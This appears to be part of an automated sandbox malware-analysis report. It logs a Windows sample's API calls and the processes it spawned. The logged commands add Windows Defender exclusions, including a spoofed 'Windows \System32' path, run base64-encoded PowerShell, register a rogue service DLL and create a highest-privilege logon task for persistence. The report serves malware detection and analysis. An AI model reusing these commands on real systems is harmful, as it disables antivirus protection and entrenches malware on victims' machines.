    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9369E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8A9369E30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A936A8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF8A936A8B4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA24E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF8BA24E24C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA24D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8BA24D768
    Source: C:\Windows \System32\printui.exeCode function: 35_2_00007FF7ECF41B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00007FF7ECF41B5C
    Source: C:\Windows \System32\printui.exeCode function: 35_2_00007FF7ECF41880 SetUnhandledExceptionFilter,35_2_00007FF7ECF41880
    Source: C:\Windows \System32\printui.exeCode function: 39_2_00007FF7ECF41B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00007FF7ECF41B5C
    Source: C:\Windows \System32\printui.exeCode function: 39_2_00007FF7ECF41880 SetUnhandledExceptionFilter,39_2_00007FF7ECF41880
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,55_2_64947650
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,55_2_6828C940
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D4A3F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00007FF8A7D4A3F8
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3C9B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,55_2_00007FF8A7D3C9B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00007FF8B83BFA50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,55_2_00007FF8B83BEE70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90D7178 SetUnhandledExceptionFilter,55_2_00007FF8B90D7178
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90D6630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,55_2_00007FF8B90D6630
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90D6F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00007FF8B90D6F94

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell decode and execute
    Source: Yara matchFile source: amsi64_7112.amsi.csv, type: OTHER
    Adds a directory exclusion to Windows Defender
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x610437
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bav64.exe "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$dec = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $dec;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$dec = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $dec;"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x610437 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x610437\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x610437.dat" /f && sc start x610437
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$dec = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $dec;"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x610437 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x610437\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x610437.dat" /f && sc start x610437Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$dec = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $dec;"Jump to behavior
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71278BC80 cpuid 0_2_00007FF71278BC80
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,0_2_00007FF712781F6C
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF712789C04
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,0_2_00007FF712781C04
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: EnumSystemLocalesEx,0_2_00007FF712781B34
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: EnumSystemLocalesW,0_2_00007FF712789508
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF7127891A4
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF712789A0C
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: GetLocaleInfoW,0_2_00007FF712789AC0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: GetLocaleInfoW,0_2_00007FF7127898B4
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: EnumSystemLocalesW,0_2_00007FF712781890
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: EnumSystemLocalesW,0_2_00007FF7127895D8
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF712789670
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,5_2_00007FF6CABF8268
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,5_2_00007FF6CABF7B8C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,5_2_00007FF6CAC00CF8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,5_2_00007FF6CAC00A1C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,5_2_00007FF6CAC0094C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF6CAC00AB4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF6CAC01048
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesEx,5_2_00007FF6CABF7E30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,5_2_00007FF6CAC00F04
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,5_2_00007FF6CABF7F00
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00007FF6CAC00E50
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,5_2_00007FF6CAC005E8
    Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,55_2_682864E0
    Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,55_2_68287D70
    Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,55_2_68286680
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,55_2_00007FF8A7D5708C
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,55_2_00007FF8A7D65894
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,55_2_00007FF8A7D6569C
    Source: C:\Windows\System32\svchost.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,55_2_00007FF8A7D64E34
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,55_2_00007FF8A7D5756C
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesEx,55_2_00007FF8A7D5749C
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,FormatMessageA,55_2_00007FF8A7D3AB38
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,55_2_00007FF8A7D65268
    Source: C:\Windows\System32\svchost.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,55_2_00007FF8A7D579C8
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,55_2_00007FF8A7D65198
    Source: C:\Windows\System32\svchost.exeCode function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,55_2_00007FF8B90D4B70
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
